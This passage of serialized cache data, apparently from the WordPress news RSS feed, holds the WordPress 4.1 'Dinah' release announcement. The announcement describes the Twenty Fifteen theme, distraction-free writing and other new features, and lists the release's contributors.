+0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"en-US\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"generator\";a:1:{i:0;a:5:{s:4:\"data\";s:39:\"http://wordpress.org/?v=4.2-alpha-31464\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:10:{i:0;a:6:{s:4:\"data\";s:42:\"\n \n \n \n \n \n \n\n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"WordPress 4.1 “Dinah”\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:41:\"https://wordpress.org/news/2014/12/dinah/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"https://wordpress.org/news/2014/12/dinah/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 18 Dec 2014 18:35:05 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3386\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:360:\"Version 4.1 of WordPress, named “Dinah” in honor of jazz singer Dinah Washington, is available for download or update in your WordPress dashboard. New features in WordPress 4.1 help you focus on your writing, and the new default theme lets you show it off in style. Introducing Twenty Fifteen Our newest default theme, Twenty Fifteen, is […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Matt Mullenweg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:24563:\"<p>Version 4.1 of WordPress, named “Dinah” in honor of jazz singer <a href=\"http://wikipedia.org/wiki/Dinah_Washington\">Dinah Washington</a>, is available for download or update in your WordPress dashboard. New features in WordPress 4.1 help you focus on your writing, and the new default theme lets you show it off in style.</p>\n<hr />\n<h2 style=\"text-align: center\">Introducing Twenty Fifteen</h2>\n<p><img class=\"aligncenter size-large wp-image-3389\" src=\"https://wordpress.org/news/files/2014/12/2015-laptop-1024x533.png\" alt=\"2015-laptop\" width=\"692\" height=\"360\" /></p>\n<h3>Our newest default theme, Twenty Fifteen, is a blog-focused theme designed for clarity.</h3>\n<p><img class=\"alignright wp-image-3426 size-medium\" src=\"https://wordpress.org/news/files/2014/12/2015-phones-languages-small-300x250.png\" alt=\"\" width=\"300\" height=\"250\" />Twenty Fifteen has flawless language support, with help from <a href=\"https://www.google.com/get/noto/\">Google’s Noto font family</a>.</p>\n<p>The straightforward typography is readable on any screen size.</p>\n<p>Your content always takes center stage, whether viewed on a phone, tablet, laptop, or desktop computer.</p>\n<hr />\n<h2 style=\"text-align: center\">Distraction-free writing</h2>\n<p><img class=\"aligncenter size-large wp-image-3392\" src=\"https://wordpress.org/news/files/2014/12/dfw-screen-1024x614.png\" alt=\"dfw-screen\" width=\"692\" height=\"415\" /></p>\n<h3 style=\"text-align: center\"><em>Just write.</em></h3>\n<p>Sometimes, you just need to concentrate on putting your thoughts into words. Try turning on <strong>distraction-free writing mode</strong>. When you start typing, all the distractions will fade away, letting you focus solely on your writing. All your editing tools instantly return when you need them.</p>\n<hr />\n<h2 style=\"text-align: center\">The Finer Points</h2>\n<h5><strong><img class=\"alignleft wp-image-3405\" src=\"https://wordpress.org/news/files/2014/12/icon-language2.png\" alt=\"\" width=\"80\" height=\"80\" /></strong>Choose a language</h5>\n<p>Right now, WordPress 4.1 is already translated into over forty languages, with more always in progress. You can switch to any translation on the General Settings screen.</p>\n<h5><strong><img class=\"alignleft wp-image-3406\" src=\"https://wordpress.org/news/files/2014/12/icon-logout1.png\" alt=\"\" width=\"80\" height=\"80\" /></strong>Log out everywhere</h5>\n<p>If you’ve ever worried you forgot to sign out from a shared computer, you can now go to your profile and log out everywhere.</p>\n<h5><strong><img class=\"alignleft wp-image-3407\" src=\"https://wordpress.org/news/files/2014/12/icon-vine1.png\" alt=\"\" width=\"80\" height=\"80\" /></strong>Vine embeds</h5>\n<p>Embedding videos from Vine is as simple as pasting a URL onto its own line in a post. See the <a href=\"https://codex.wordpress.org/Embeds\">full list</a> of supported embeds.</p>\n<h5><strong><img class=\"alignleft wp-image-3408\" src=\"https://wordpress.org/news/files/2014/12/icon-recommended1.png\" alt=\"\" width=\"80\" height=\"80\" /></strong>Plugin recommendations</h5>\n<p>The plugin installer suggests plugins for you to try. Recommendations are based on the plugins you and other users have installed.</p>\n<hr />\n<h2 style=\"text-align: center\">Under the Hood</h2>\n<h5>Complex Queries</h5>\n<p>Metadata, date, and term queries now support advanced conditional logic, like nested clauses and multiple operators — <code>A AND ( B OR C )</code>.</p>\n<h5>Customizer API</h5>\n<p>The customizer now supports conditionally showing panels and sections based on the page being previewed.</p>\n<h5><code><title></code> tags in themes</h5>\n<p><code>add_theme_support( \'title-tag\' )</code> tells WordPress to handle the complexities of document titles.</p>\n<h5>Developer Reference</h5>\n<p>Continued improvements to inline code documentation have made the <a href=\"https://developer.wordpress.org/reference/\">developer reference</a> more complete than ever.</p>\n<hr />\n<h2 style=\"text-align: center\">The Choir</h2>\n<p>This release was led by <a href=\"https://profiles.wordpress.org/johnbillion\">John Blackbourn</a>, with the help of these awesome folks. Check out some of their profiles while listening to Dinah Washington on the music service of your choice:</p>\n<a href=\"https://profiles.wordpress.org/aaroncampbell\">Aaron D. Campbell</a>, <a href=\"https://profiles.wordpress.org/jorbin\">Aaron Jorbin</a>, <a href=\"https://profiles.wordpress.org/adamsilverstein\">Adam Silverstein</a>, <a href=\"https://profiles.wordpress.org/akumria\">akumria</a>, <a href=\"https://profiles.wordpress.org/xknown\">Alex Concha</a>, <a href=\"https://profiles.wordpress.org/viper007bond\">Alex Mills (Viper007Bond)</a>, <a href=\"https://profiles.wordpress.org/tellyworth\">Alex Shiels</a>, <a href=\"https://profiles.wordpress.org/collinsinternet\">Allan Collins</a>, <a href=\"https://profiles.wordpress.org/momo360modena\">Amaury Balmer</a>, <a href=\"https://profiles.wordpress.org/amruta123b\">Amruta Bhosale</a>, <a href=\"https://profiles.wordpress.org/afercia\">Andrea Fercia</a>, <a href=\"https://profiles.wordpress.org/andg\">Andrea Gandino</a>, <a href=\"https://profiles.wordpress.org/sumobi\">Andrew Munro (sumobi)</a>, <a href=\"https://profiles.wordpress.org/nacin\">Andrew Nacin</a>, <a href=\"https://profiles.wordpress.org/azaozz\">Andrew Ozz</a>, <a href=\"https://profiles.wordpress.org/andrewryno\">Andrew Ryno</a>, <a href=\"https://profiles.wordpress.org/rarst\">Andrey \"Rarst\" Savchenko</a>, <a href=\"https://profiles.wordpress.org/ankitgadertcampcom\">Ankit Gade</a>, <a href=\"https://profiles.wordpress.org/ankit-k-gupta\">Ankit K Gupta</a>, <a href=\"https://profiles.wordpress.org/antpb\">Anthony Burchell</a>, <a href=\"https://profiles.wordpress.org/arippberger\">arippberger</a>, <a href=\"https://profiles.wordpress.org/filosofo\">Austin Matzko</a>, <a href=\"https://profiles.wordpress.org/bainternet\">Bainternet</a>, <a href=\"https://profiles.wordpress.org/barrykooij\">Barry Kooij</a>, <a href=\"https://profiles.wordpress.org/empireoflight\">Ben Dunkle</a>, <a href=\"https://profiles.wordpress.org/benjmay\">Ben May</a>, <a href=\"https://profiles.wordpress.org/neoxx\">Bernhard Riedl</a>, <a href=\"https://profiles.wordpress.org/birgire\">Birgir Erlendsson (birgire)</a>, <a href=\"https://profiles.wordpress.org/bobbingwide\">bobbingwide</a>, <a href=\"https://profiles.wordpress.org/boonebgorges\">Boone B. Gorges</a>, <a href=\"https://profiles.wordpress.org/bradyvercher\">Brady Vercher</a>, <a href=\"https://profiles.wordpress.org/bramd\">Bram Duvigneau</a>, <a href=\"https://profiles.wordpress.org/kraftbj\">Brandon Kraft</a>, <a href=\"https://profiles.wordpress.org/briandichiara\">Brian DiChiara</a>, <a href=\"https://profiles.wordpress.org/rzen\">Brian Richards</a>, <a href=\"https://profiles.wordpress.org/bswatson\">Brian Watson</a>, <a href=\"https://profiles.wordpress.org/camdensegal\">Camden Segal</a>, <a href=\"https://profiles.wordpress.org/captaintheme\">Captain Theme</a>, <a href=\"https://profiles.wordpress.org/hiwhatsup\">Carlos</a>, <a href=\"https://profiles.wordpress.org/caspie\">Caspie</a>, <a href=\"https://profiles.wordpress.org/ccprice\">ccprice</a>, <a href=\"https://profiles.wordpress.org/mackensen\">Charles Fulton</a>, <a href=\"https://profiles.wordpress.org/chrico\">ChriCo</a>, <a href=\"https://profiles.wordpress.org/aprea\">Chris Aprea</a>, <a href=\"https://profiles.wordpress.org/chrisbliss18\">Chris Jean</a>, <a href=\"https://profiles.wordpress.org/cmmarslender\">Chris Marslender</a>, <a href=\"https://profiles.wordpress.org/jazzs3quence\">Chris Reynolds</a>, <a href=\"https://profiles.wordpress.org/chriscct7\">chriscct7</a>, <a href=\"https://profiles.wordpress.org/chrisl27\">chrisl27</a>, <a href=\"https://profiles.wordpress.org/cfoellmann\">Christian Foellmann</a>, <a href=\"https://profiles.wordpress.org/cfinke\">Christopher Finke</a>, <a href=\"https://profiles.wordpress.org/cyclometh\">Corey Snow</a>, <a href=\"https://profiles.wordpress.org/corphi\">Corphi</a>, <a href=\"https://profiles.wordpress.org/curtjen\">curtjen</a>, <a href=\"https://profiles.wordpress.org/colorful-tones\">Damon Cook</a>, <a href=\"https://profiles.wordpress.org/dancameron\">Dan Cameron</a>, <a href=\"https://profiles.wordpress.org/danielbachhuber\">Daniel Bachhuber</a>, <a href=\"https://profiles.wordpress.org/convissor\">Daniel Convissor</a>, <a href=\"https://profiles.wordpress.org/nerrad\">Darren Ethier (nerrad)</a>, <a href=\"https://profiles.wordpress.org/koop\">Daryl Koopersmith</a>, <a href=\"https://profiles.wordpress.org/dmchale\">Dave McHale</a>, <a href=\"https://profiles.wordpress.org/davidakennedy\">David A. Kennedy</a>, <a href=\"https://profiles.wordpress.org/dlh\">David Herrera</a>, <a href=\"https://profiles.wordpress.org/davidjlaietta\">David Laietta</a>, <a href=\"https://profiles.wordpress.org/technical_mastermind\">David Wood</a>, <a href=\"https://profiles.wordpress.org/davidthemachine\">DavidTheMachine</a>, <a href=\"https://profiles.wordpress.org/dcavins\">dcavins</a>, <a href=\"https://profiles.wordpress.org/realloc\">Dennis Ploetner</a>, <a href=\"https://profiles.wordpress.org/dd32\">Dion Hulse</a>, <a href=\"https://profiles.wordpress.org/wedi\">Dirk Weise</a>, <a href=\"https://profiles.wordpress.org/ocean90\">Dominik Schilling</a>, <a href=\"https://profiles.wordpress.org/dominikschwind-1\">Dominik Schwind</a>, <a href=\"https://profiles.wordpress.org/drewapicture\">Drew Jaynes</a>, <a href=\"https://profiles.wordpress.org/dustyf\">Dustin Filippini</a>, <a href=\"https://profiles.wordpress.org/dustinhartzler\">Dustin Hartzler</a>, <a href=\"https://profiles.wordpress.org/eliorivero\">Elio Rivero</a>, <a href=\"https://profiles.wordpress.org/ebinnion\">Eric Binnion</a>, <a href=\"https://profiles.wordpress.org/ew_holmes\">Eric Holmes</a>, <a href=\"https://profiles.wordpress.org/ericlewis\">Eric Lewis</a>, <a href=\"https://profiles.wordpress.org/fab1en\">Fabien Quatravaux</a>, <a href=\"https://profiles.wordpress.org/florianziegler\">Florian Ziegler</a>, <a href=\"https://profiles.wordpress.org/hereswhatidid\">Gabe Shackle</a>, <a href=\"https://profiles.wordpress.org/garyc40\">Gary Cao</a>, <a href=\"https://profiles.wordpress.org/pento\">Gary Pendergast</a>, <a href=\"https://profiles.wordpress.org/soulseekah\">Gennady Kovshenin</a>, <a href=\"https://profiles.wordpress.org/babbardel\">George Olaru</a>, <a href=\"https://profiles.wordpress.org/georgestephanis\">George Stephanis</a>, <a href=\"https://profiles.wordpress.org/gregrickaby\">Greg Rickaby</a>, <a href=\"https://profiles.wordpress.org/gcorne\">Gregory Cornelius</a>, <a href=\"https://profiles.wordpress.org/tivnet\">Gregory Karpinsky (@tivnet)</a>, <a href=\"https://profiles.wordpress.org/bordoni\">Gustavo Bordoni</a>, <a href=\"https://profiles.wordpress.org/hardy101\">hardy101</a>, <a href=\"https://profiles.wordpress.org/hauvong\">hauvong</a>, <a href=\"https://profiles.wordpress.org/helen\">Helen Hou-Sandí</a>, <a href=\"https://profiles.wordpress.org/heshiming\">heshiming</a>, <a href=\"https://profiles.wordpress.org/honeysilvas\">honeysilvas</a>, <a href=\"https://profiles.wordpress.org/hugodelgado\">hugodelgado</a>, <a href=\"https://profiles.wordpress.org/iandstewart\">Ian Stewart</a>, <a href=\"https://profiles.wordpress.org/ianmjones\">ianmjones</a>, <a href=\"https://profiles.wordpress.org/igmoweb\">Ignacio Cruz Moreno</a>, <a href=\"https://profiles.wordpress.org/imath\">imath</a>, <a href=\"https://profiles.wordpress.org/ipstenu\">Ipstenu (Mika Epstein)</a>, <a href=\"https://profiles.wordpress.org/ivankristianto\">Ivan Kristianto</a>, <a href=\"https://profiles.wordpress.org/jdgrimes\">J.D. Grimes</a>, <a href=\"https://profiles.wordpress.org/jaimieolmstead\">jaimieolmstead</a>, <a href=\"https://profiles.wordpress.org/jakubtyrcha\">jakub.tyrcha</a>, <a href=\"https://profiles.wordpress.org/janhenckens\">janhenckens</a>, <a href=\"https://profiles.wordpress.org/avryl\">Janneke Van Dorpe</a>, <a href=\"https://profiles.wordpress.org/japh\">Japh</a>, <a href=\"https://profiles.wordpress.org/jwenerd\">Jared Wenerd</a>, <a href=\"https://profiles.wordpress.org/jarednova\">jarednova</a>, <a href=\"https://profiles.wordpress.org/jeanyoungkim\">jeanyoungkim</a>, <a href=\"https://profiles.wordpress.org/jfarthing84\">Jeff Farthing</a>, <a href=\"https://profiles.wordpress.org/jeffstieler\">Jeff Stieler</a>, <a href=\"https://profiles.wordpress.org/jeremyfelt\">Jeremy Felt</a>, <a href=\"https://profiles.wordpress.org/jeherve\">Jeremy Herve</a>, <a href=\"https://profiles.wordpress.org/jesin\">Jesin A</a>, <a href=\"https://profiles.wordpress.org/jayjdk\">Jesper Johansen (jayjdk)</a>, <a href=\"https://profiles.wordpress.org/engelen\">Jesper van Engelen</a>, <a href=\"https://profiles.wordpress.org/jessepollak\">Jesse Pollak</a>, <a href=\"https://profiles.wordpress.org/jipmoors\">jipmoors</a>, <a href=\"https://profiles.wordpress.org/joedolson\">Joe Dolson</a>, <a href=\"https://profiles.wordpress.org/joemcgill\">Joe McGill</a>, <a href=\"https://profiles.wordpress.org/johneckman\">John Eckman</a>, <a href=\"https://profiles.wordpress.org/johnrom\">johnrom</a>, <a href=\"https://profiles.wordpress.org/johnstonphilip\">johnstonphilip</a>, <a href=\"https://profiles.wordpress.org/jb510\">Jon Brown</a>, <a href=\"https://profiles.wordpress.org/duck_\">Jon Cave</a>, <a href=\"https://profiles.wordpress.org/jbrinley\">Jonathan Brinley</a>, <a href=\"https://profiles.wordpress.org/desrosj\">Jonathan Desrosiers</a>, <a href=\"https://profiles.wordpress.org/joostdevalk\">Joost de Valk</a>, <a href=\"https://profiles.wordpress.org/softmodeling\">Jordi Cabot</a>, <a href=\"https://profiles.wordpress.org/joshuaabenazer\">Joshua Abenazer</a>, <a href=\"https://profiles.wordpress.org/tai\">JOTAKI Taisuke</a>, <a href=\"https://profiles.wordpress.org/jrf\">jrf</a>, <a href=\"https://profiles.wordpress.org/julien731\">Julien Liabeuf</a>, <a href=\"https://profiles.wordpress.org/justinsainton\">Justin Sainton</a>, <a href=\"https://profiles.wordpress.org/jtsternberg\">Justin Sternberg</a>, <a href=\"https://profiles.wordpress.org/kadamwhite\">K.Adam White</a>, <a href=\"https://profiles.wordpress.org/trepmal\">Kailey (trepmal)</a>, <a href=\"https://profiles.wordpress.org/kamelkev\">kamelkev</a>, <a href=\"https://profiles.wordpress.org/karpstrucking\">karpstrucking</a>, <a href=\"https://profiles.wordpress.org/keesiemeijer\">keesiemeijer</a>, <a href=\"https://profiles.wordpress.org/ryelle\">Kelly Dwan</a>, <a href=\"https://profiles.wordpress.org/kevinlangleyjr\">Kevin Langley</a>, <a href=\"https://profiles.wordpress.org/kdoran\">Kiko Doran</a>, <a href=\"https://profiles.wordpress.org/kpdesign\">Kim Parsell</a>, <a href=\"https://profiles.wordpress.org/kwight\">Kirk Wight</a>, <a href=\"https://profiles.wordpress.org/kitchin\">kitchin</a>, <a href=\"https://profiles.wordpress.org/ixkaito\">Kite</a>, <a href=\"https://profiles.wordpress.org/knutsp\">Knut Sparhell</a>, <a href=\"https://profiles.wordpress.org/kovshenin\">Konstantin Kovshenin</a>, <a href=\"https://profiles.wordpress.org/obenland\">Konstantin Obenland</a>, <a href=\"https://profiles.wordpress.org/kosvrouvas\">Kostas Vrouvas</a>, <a href=\"https://profiles.wordpress.org/kraftner\">kraftner</a>, <a href=\"https://profiles.wordpress.org/kristastevens\">kristastevens</a>, <a href=\"https://profiles.wordpress.org/kurtpayne\">Kurt Payne</a>, <a href=\"https://profiles.wordpress.org/lancewillett\">Lance Willett</a>, <a href=\"https://profiles.wordpress.org/offereins\">Laurens Offereins</a>, <a href=\"https://profiles.wordpress.org/linuxologos\">linuxologos</a>, <a href=\"https://profiles.wordpress.org/ideag\">Liuiza Arunas</a>, <a href=\"https://profiles.wordpress.org/loushou\">loushou</a>, <a href=\"https://profiles.wordpress.org/latz\">Lutz Schroer</a>, <a href=\"https://profiles.wordpress.org/manoz69\">Manoz69</a>, <a href=\"https://profiles.wordpress.org/mantismamita\">mantismamita</a>, <a href=\"https://profiles.wordpress.org/marcosf\">Marco Schmoecker</a>, <a href=\"https://profiles.wordpress.org/nofearinc\">Mario Peshev</a>, <a href=\"https://profiles.wordpress.org/clorith\">Marius (Clorith)</a>, <a href=\"https://profiles.wordpress.org/landakram\">Mark Hudnall</a>, <a href=\"https://profiles.wordpress.org/markjaquith\">Mark Jaquith</a>, <a href=\"https://profiles.wordpress.org/senff\">Mark Senff</a>, <a href=\"https://profiles.wordpress.org/markoheijnen\">Marko Heijnen</a>, <a href=\"https://profiles.wordpress.org/marsjaninzmarsa\">marsjaninzmarsa</a>, <a href=\"https://profiles.wordpress.org/matveb\">Matias Ventura</a>, <a href=\"https://profiles.wordpress.org/matt\">Matt Mullenweg</a>, <a href=\"https://profiles.wordpress.org/mattwiebe\">Matt Wiebe</a>, <a href=\"https://profiles.wordpress.org/mboynes\">Matthew Boynes</a>, <a href=\"https://profiles.wordpress.org/mattheu\">Matthew Haines-Young</a>, <a href=\"https://profiles.wordpress.org/mattkeys\">mattkeys</a>, <a href=\"https://profiles.wordpress.org/mlteal\">Maura Teal</a>, <a href=\"https://profiles.wordpress.org/melchoyce\">Mel Choyce</a>, <a href=\"https://profiles.wordpress.org/merty\">Mert Yazicioglu</a>, <a href=\"https://profiles.wordpress.org/mdawaffe\">Michael Adams (mdawaffe)</a>, <a href=\"https://profiles.wordpress.org/michael-arestad\">Michael Arestad</a>, <a href=\"https://profiles.wordpress.org/tw2113\">Michael Beckwith</a>, <a href=\"https://profiles.wordpress.org/cainm\">Michael Cain</a>, <a href=\"https://profiles.wordpress.org/smashcut\">Michael Pick</a>, <a href=\"https://profiles.wordpress.org/michalzuber\">michalzuber</a>, <a href=\"https://profiles.wordpress.org/chellycat\">Michelle Langston</a>, <a href=\"https://profiles.wordpress.org/mcsf\">Miguel Fonseca</a>, <a href=\"https://profiles.wordpress.org/mikehansenme\">Mike Hansen</a>, <a href=\"https://profiles.wordpress.org/mikejolley\">Mike Jolley</a>, <a href=\"https://profiles.wordpress.org/mnelson4\">Mike Nelson</a>, <a href=\"https://profiles.wordpress.org/dh-shredder\">Mike Schroder</a>, <a href=\"https://profiles.wordpress.org/mikeyarce\">Mikey Arce</a>, <a href=\"https://profiles.wordpress.org/studionashvegas\">Mitch Canter (studionashvegas)</a>, <a href=\"https://profiles.wordpress.org/morganestes\">Morgan Estes</a>, <a href=\"https://profiles.wordpress.org/mor10\">Morten Rand-Hendriksen</a>, <a href=\"https://profiles.wordpress.org/mvd7793\">mvd7793</a>, <a href=\"https://profiles.wordpress.org/alex-ye\">Nashwan Doaqan</a>, <a href=\"https://profiles.wordpress.org/niallkennedy\">Niall Kennedy</a>, <a href=\"https://profiles.wordpress.org/celloexpressions\">Nick Halsey</a>, <a href=\"https://profiles.wordpress.org/nikv\">Nikhil Vimal (NikV)</a>, <a href=\"https://profiles.wordpress.org/nikolovtmw\">Nikola Nikolov</a>, <a href=\"https://profiles.wordpress.org/nobleclem\">nobleclem</a>, <a href=\"https://profiles.wordpress.org/noplanman\">noplanman</a>, <a href=\"https://profiles.wordpress.org/nvwd\">Nowell VanHoesen</a>, <a href=\"https://profiles.wordpress.org/originalexe\">OriginalEXE</a>, <a href=\"https://profiles.wordpress.org/p_enrique\">p_enrique</a>, <a href=\"https://profiles.wordpress.org/pushplaybang\">Paul</a>, <a href=\"https://profiles.wordpress.org/pauldewouters\">Paul de Wouters</a>, <a href=\"https://profiles.wordpress.org/paulschreiber\">Paul Schreiber</a>, <a href=\"https://profiles.wordpress.org/paulwilde\">Paul Wilde</a>, <a href=\"https://profiles.wordpress.org/pavelevap\">pavelevap</a>, <a href=\"https://profiles.wordpress.org/peterchester\">Peter Chester</a>, <a href=\"https://profiles.wordpress.org/donutz\">Peter J. Herrel</a>, <a href=\"https://profiles.wordpress.org/westi\">Peter Westwood</a>, <a href=\"https://profiles.wordpress.org/peterwilsoncc\">Peter Wilson</a>, <a href=\"https://profiles.wordpress.org/philiparthurmoore\">Philip Arthur Moore</a>, <a href=\"https://profiles.wordpress.org/phpmypython\">phpmypython</a>, <a href=\"https://profiles.wordpress.org/mordauk\">Pippin Williamson</a>, <a href=\"https://profiles.wordpress.org/nprasath002\">Prasath Nadarajah</a>, <a href=\"https://profiles.wordpress.org/psycleuk\">psycleuk</a>, <a href=\"https://profiles.wordpress.org/ptahdunbar\">Ptah Dunbar</a>, <a href=\"https://profiles.wordpress.org/quietnic\">quietnic</a>, <a href=\"https://profiles.wordpress.org/rachelbaker\">Rachel Baker</a>, <a href=\"https://profiles.wordpress.org/ramiy\">Rami Yushuvaev</a>, <a href=\"https://profiles.wordpress.org/ramiabraham\">ramiabraham</a>, <a href=\"https://profiles.wordpress.org/greuben\">Reuben Gunday</a>, <a href=\"https://profiles.wordpress.org/rianrietveld\">Rian Rietveld</a>, <a href=\"https://profiles.wordpress.org/richardmtl\">Richard Archambault</a>, <a href=\"https://profiles.wordpress.org/rickalee\">Ricky Lee Whittemore</a>, <a href=\"https://profiles.wordpress.org/miqrogroove\">Robert Chapin</a>, <a href=\"https://profiles.wordpress.org/rodrigosprimo\">Rodrigo Primo</a>, <a href=\"https://profiles.wordpress.org/ryan\">Ryan Boren</a>, <a href=\"https://profiles.wordpress.org/ryankienstra\">Ryan Kienstra</a>, <a href=\"https://profiles.wordpress.org/rmccue\">Ryan McCue</a>, <a href=\"https://profiles.wordpress.org/sakinshrestha\">Sakin Shrestha</a>, <a href=\"https://profiles.wordpress.org/samhotchkiss\">Sam Hotchkiss</a>, <a href=\"https://profiles.wordpress.org/otto42\">Samuel Wood (Otto)</a>, <a href=\"https://profiles.wordpress.org/sc0ttkclark\">Scott Kingsley Clark</a>, <a href=\"https://profiles.wordpress.org/coffee2code\">Scott Reilly</a>, <a href=\"https://profiles.wordpress.org/wonderboymusic\">Scott Taylor</a>, <a href=\"https://profiles.wordpress.org/sergeybiryukov\">Sergey Biryukov</a>, <a href=\"https://profiles.wordpress.org/shooper\">Shawn Hooper</a>, <a href=\"https://profiles.wordpress.org/simonp303\">Simon Pollard</a>, <a href=\"https://profiles.wordpress.org/simonwheatley\">Simon Wheatley</a>, <a href=\"https://profiles.wordpress.org/skaeser\">skaeser</a>, <a href=\"https://profiles.wordpress.org/slobodanmanic\">Slobodan Manic</a>, <a href=\"https://profiles.wordpress.org/socki03\">socki03</a>, <a href=\"https://profiles.wordpress.org/solarissmoke\">solarissmoke</a>, <a href=\"https://profiles.wordpress.org/stephdau\">Stephane Daury</a>, <a href=\"https://profiles.wordpress.org/netweb\">Stephen Edgar</a>, <a href=\"https://profiles.wordpress.org/stephenharris\">Stephen Harris</a>, <a href=\"https://profiles.wordpress.org/stevegrunwell\">Steve Grunwell</a>, <a href=\"https://profiles.wordpress.org/5um17\">Sumit Singh</a>, <a href=\"https://profiles.wordpress.org/tacoverdo\">TacoVerdo</a>, <a href=\"https://profiles.wordpress.org/iamtakashi\">Takashi Irie</a>, <a href=\"https://profiles.wordpress.org/miyauchi\">Takayuki Miyauchi</a>, <a href=\"https://profiles.wordpress.org/karmatosed\">Tammie</a>, <a href=\"https://profiles.wordpress.org/tareq1988\">Tareq Hasan</a>, <a href=\"https://profiles.wordpress.org/tlovett1\">Taylor Lovett</a>, <a href=\"https://profiles.wordpress.org/ipm-frommen\">Thorsten Frommen</a>, <a href=\"https://profiles.wordpress.org/tillkruess\">Till Kruss</a>, <a href=\"https://profiles.wordpress.org/tschutter\">Tobias Schutter</a>, <a href=\"https://profiles.wordpress.org/tobiasbg\">TobiasBg</a>, <a href=\"https://profiles.wordpress.org/tmtrademark\">Toby McKes</a>, <a href=\"https://profiles.wordpress.org/tjnowell\">Tom J Nowell</a>, <a href=\"https://profiles.wordpress.org/tomasm\">Tomas Mackevicius</a>, <a href=\"https://profiles.wordpress.org/tomharrigan\">TomHarrigan</a>, <a href=\"https://profiles.wordpress.org/topher1kenobe\">Topher</a>, <a href=\"https://profiles.wordpress.org/zodiac1978\">Torsten Landsiedel</a>, <a href=\"https://profiles.wordpress.org/liljimmi\">Tracy Levesque</a>, <a href=\"https://profiles.wordpress.org/transom\">transom</a>, <a href=\"https://profiles.wordpress.org/wpsmith\">Travis Smith</a>, <a href=\"https://profiles.wordpress.org/tywayne\">Ty Carlson</a>, <a href=\"https://profiles.wordpress.org/desaiuditd\">Udit Desai</a>, <a href=\"https://profiles.wordpress.org/umeshsingla\">Umesh Kumar</a>, <a href=\"https://profiles.wordpress.org/vinod-dalvi\">Vinod Dalvi</a>, <a href=\"https://profiles.wordpress.org/vlajos\">vlajos</a>, <a href=\"https://profiles.wordpress.org/voldemortensen\">voldemortensen</a>, <a href=\"https://profiles.wordpress.org/westonruter\">Weston Ruter</a>, <a href=\"https://profiles.wordpress.org/yoavf\">Yoav Farhi</a>, <a href=\"https://profiles.wordpress.org/nobinobi\">Yuta Sekine</a>, <a href=\"https://profiles.wordpress.org/zrothauser\">Zack Rothauser</a>, and <a href=\"https://profiles.wordpress.org/tollmanz\">Zack Tollman</a>.\n<p>There were 283 contributors to this release, again a new high.</p>\n<p>If you want to help out or follow along, check out <a href=\"https://make.wordpress.org/\">Make WordPress</a> and our <a href=\"https://make.wordpress.org/core/\">core development blog</a>.</p>\n<p>Thanks for choosing WordPress. Happy holidays and see you next year for version 4.2!</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"https://wordpress.org/news/2014/12/dinah/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:45:\"\n \n \n \n \n \n \n \n\n \n \n \n \n \n 